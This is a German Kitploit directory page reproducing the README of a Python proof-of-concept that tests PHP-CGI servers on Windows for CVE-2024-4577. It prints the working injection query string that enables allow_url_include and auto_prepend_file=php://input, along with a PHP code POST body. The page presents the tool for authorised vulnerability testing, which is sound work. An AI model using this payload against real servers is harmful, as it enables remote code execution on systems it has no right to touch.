Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2024-4577 — Python PoC-Skript zum Testen auf CVE-2024-4577 PHP CGI-Sicherheitslücke mittels Query-String-Injection und POST-Payload, um die Server-Anfälligkeit zu bestimmen. | Kitploit
Tools/GitHubGitHub/kimjuhyeong95/cve-2024-4577
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubkimjuhyeong95/cve-2024-4577

cve-2024-4577

Python PoC-Skript zum Testen auf CVE-2024-4577 PHP CGI-Sicherheitslücke mittels Query-String-Injection und POST-Payload, um die Server-Anfälligkeit zu bestimmen.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-4577 Schwachstellen-Test-Skript

Dieses Python-Skript ist ein einfaches PoC (Proof of Concept) Tool zur Diagnose der neuesten PHP-Schwachstelle CVE-2024-4577.

⚠️ Dieses Tool wird zu Sicherheitsdiagnosezwecken bereitgestellt und darf nur auf eigenen Systemen oder mit vorheriger Genehmigung verwendet werden.


📌 Überblick

Diese Schwachstelle tritt auf, wenn PHP im CGI-Modus unter Windows arbeitet und es durch Umgehung von Multibyte-Zeichen ermöglicht wird, beliebige PHP-Einstellungen einzuschleusen und die Codeausführung zu erzwingen.

Dieses Skript sendet einen query-string-basierten Umgehungs-Payload und PHP-Code per POST-Anfrage an die Ziel-URL, um die Schwachstelle zu überprüfen.


✅ Verwendung

1. Python-Installation prüfen

root@kitploit:~
python3 --version

2. Abhängigkeiten installieren

root@kitploit:~
pip install requests

3. Skript ausführen

root@kitploit:~
python3 cve_2024_4577_test.py

4. Ziel-URL eingeben

Beispieleingabe:

root@kitploit:~
http://192.168.0.10/index.php

Oder nur den Stammpfad eingeben, wird automatisch verarbeitet

root@kitploit:~
http://192.168.0.10

🔍 Ergebnisbeschreibung

  • ✅ [✅] Schwachstelle: Der Server hat PHP-Code ausgeführt.
    → Der Server ist anfällig.

  • ✔️ [✔️] Nicht anfällig oder blockiert
    → Antwort erhalten, aber Schwachstelle nicht ausgelöst.

  • ❌ [❌] Anfrage fehlgeschlagen: ...
    → Test aufgrund von Verbindungsfehler, Timeout usw. fehlgeschlagen.


💡 Funktionsweise

  • Einschleusen der Umgehungszeichenfolge der Schwachstelle:

    root@kitploit:~
    ?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input
    
  • Einschleusen von PHP-Code in den POST-Body:

    root@kitploit:~
    <?php echo 'CVE-2024-4577-TEST'; ?>
    
  • Wenn der Server diesen Code ausführt, ist die entsprechende Zeichenfolge in der Antwort enthalten, sodass eine Beurteilung möglich ist.


⚠️ Haftungsausschluss

Dieses Skript wird ausschließlich zu Bildungs- und Sicherheitsforschungszwecken bereitgestellt. Das Scannen oder Testen nicht autorisierter Systeme ist illegal. Der Benutzer trägt die alleinige Verantwortung.


📂 Dateistruktur

DateinameBeschreibung
cve_2024_4577_test.pyPython-Skript zum Testen der Schwachstelle
README.mdDokumentation zur Verwendung und Beschreibung (diese Datei)
LICENSE.txt

📫 Kontakt

Bugs oder Vorschläge bitte per E-Mail oder PR melden.

📝 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe die Datei LICENSE für Details. Copyright (c) 2025 KimJuhyeong95

Tool herunterladen